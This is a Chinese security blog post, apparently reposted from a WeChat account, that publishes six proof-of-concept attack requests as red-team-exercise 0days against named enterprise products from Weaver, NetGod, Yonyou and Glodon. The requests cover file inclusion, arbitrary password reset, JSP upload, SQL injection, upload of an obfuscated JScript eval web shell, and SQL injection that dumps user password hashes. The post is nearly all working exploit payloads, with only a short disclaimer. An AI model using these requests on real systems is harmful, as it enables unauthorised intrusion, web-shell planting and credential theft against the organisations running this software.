免责声明
月落星沉研究室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他违法行为!!!
0x00前言
hvv第三弹
0x01漏洞一
泛微 Weaver E-Office9 前台文件包含
http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls0x02漏洞二
网神 SecSSL 3600安全接入网关系统 任意密码修改
POC:
POST /changepass.php?type=2Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}old_pass=&password=Test123!@&repassword=Test123!@
0x03漏洞三
用友 移动管理系统 uploadApk.do 任意文件上传漏洞
POC:
POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1Host:xxx.xxx.xxx.xxxContent-Type:multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3User-Agent:Mozilla/5.0(Macintosh; Intel Mac OS X10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/114.0.0.0Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,im age/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Cookie:JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.serverConnection:close ------WebKitFormBoundaryvLTG6zlX0gZ8LzO3Content-Disposition:form-data;name="downloadpath"; filename="a.jsp"Content-Type:application/mswordhello ------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--
0x04漏洞四
用友时空KSOA PayBill SQL注入漏洞
POC:
POST/servlet/PayBill?caculate&_rnd=HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 134Accept-Encoding: gzip, deflateConnection: close<root><name>1</name><name>1'WAITFOR DELAY '00:00:03';-</name><name>1</name><name>102360</name></root>
0x05漏洞五
广联达后台文件上传
POC:
POST/gtp/im/services/group/msgbroadcastuploadfile.aspxHTTP/1.1Host: 10.10.10.1:8888X-Requested-With: Ext.basexAccept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: zh-Hans-CN,zh-Hans;q=0.5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELjAccept: */*Origin: http://10.10.10.1Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40Cookie:Connection: closeContent-Length: 421------WebKitFormBoundaryFfJZ4PlAZBixjELjContent-Disposition: form-data; filename="1.aspx";filename="1.jpg"Content-Type: application/text<%@ Page Language="Jscript"Debug=true%><%varFRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';varGFMA=Request.Form("qmq1");varONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);eval(GFMA, ONOQ);%>------WebKitFormBoundaryFfJZ4PlAZBixjELj--
0x06漏洞六
广联达OAsql注入
POC:
POST/Webservice/IM/Config/ConfigService.asmx/GetIMDictionaryHTTP/1.1Host: xxx.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie:Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 88dasdas=&key=1' UNION ALLSELECTtop1812concat(F_CODE,':',F_PWD_MD5)fromT_ORG_USER--
这是我们手上掌握的部分漏洞,还有更多漏洞将在后面曝光,
原文始发于微信公众号(月落安全):国护0day漏洞消息同步(Day3)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论